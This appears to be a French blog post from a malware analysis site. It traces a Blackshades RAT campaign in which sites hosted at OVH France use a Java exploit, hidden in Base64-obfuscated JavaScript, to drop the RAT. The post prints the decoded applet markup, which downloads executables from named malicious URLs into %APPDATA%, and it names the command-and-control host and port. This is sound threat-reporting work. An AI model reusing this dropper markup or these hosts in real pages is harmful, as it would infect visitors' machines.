Blackshades RAT chez OVH France

Aujourd’hui, la VM qui contient quelques RAT a fait une mise à jour vers l’adresse : http://forthelulz.tk/bserver.exe – 91.121.85.223 OVH France.

Un tour vers le site initial et l’on voit que ce dernier propose des images, le lien des images pointe vers un binaire (funnyvideo.exe)

Le site lance un exploit Java qui va installer le RAT – rien d’exceptionnel avec les RAT.

Le Javascript malicieux qui est offusqué en Base64 en rouge ci-dessous :

Décodé, on obtient :

<applet width=’150′ height=’1′ code=’Java.class’ archive=’Java.jar’><param name=’lol’ value=’http://nlchat.us/bshades.exe’ /><param name=’location’ value=’%APPDATA%’ /><param name=’file’ value=’brAijXWL.exe’ /><param name=’r’ value =’http://zonamusical.net/tu_zona/index.php’ /></applet>
 

En cherchant l’IP 91.121.85.223 , on voit qu’un autre site zonamusical.net existe.. Un tour dessus et même topo –  un exploit Java se lance :

Le même type de JavaScript offusqué qui donne :

<applet width=’150′ height=’1′ code=’Java.class’ archive=’Java.jar’><param name=’lol’ value=’http://forthelulz.tk/bshades-crypted.exe’ /><param name=’location’ value=’%APPDATA%’ /><param name=’file’ value=’tMdDvY.exe’ /><param name=’r’ value =’http://www.forthelulz.tk/index2.html’ /></applet>
 

nlchat.us étant hébergé aussi chez OVH (46.105.127.193)

Le RAT en question se connecte à l’adresse igotu.sytes.net (174.136.43.16) sur le port 3333
L’ip se trouvant à Dallas – Texas (US)

Par contre, l’installation du RAT est foireuse au niveau de la création de la clef Run qui référence un fichier qui n’existe pas.
L’utilisation de machines chez OVH France arrivent parfois mais reste relativement rare.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 36 times, 1 visits today)

2 thoughts on “Blackshades RAT chez OVH France

  1. Après réception du dossier, les DNS enregistrés GoDaddy achetés avec des fausses identités et des coordonnées bancaires volées sont désormais paralysés. Ils ont été très rapides pour le coups à la surprise générale. Sinon le bureau des TK vient de répondre, le domaine est hors-service. Quant aux redirections dynamiques, elles vont tomber d’ici peu. Il ne reste plus qu’OVH FRANCE … pour changer 🙂

    Allez Malekal, courage.
    Keep up the good work !

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *